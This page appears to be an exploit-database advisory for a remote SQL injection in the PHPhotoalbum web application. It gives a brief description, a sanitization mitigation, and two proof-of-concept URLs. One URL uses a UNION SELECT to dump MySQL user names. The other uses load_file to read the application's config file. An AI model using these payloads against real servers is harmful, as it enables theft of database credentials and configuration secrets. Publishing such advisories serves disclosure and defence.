header-logo
Suggest Exploit
vendor:
PHPhotoalbum
by:
Anonymous
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHPhotoalbum
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2020

PHPhotoalbum Remote sql injection Vulnerability

This vulnerability allows an attacker to inject malicious SQL code into the PHPhotoalbum application. By sending a specially crafted HTTP request to the application, an attacker can execute arbitrary SQL commands on the underlying database. This can be used to gain access to sensitive information such as usernames and passwords.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

# Title: PHPhotoalbum Remote sql injection Vulnerability
# Tested on: windows

http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+user+from+mysql.user--



http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+load_file(/directory hex/config.inc.php)+from+mysql.user--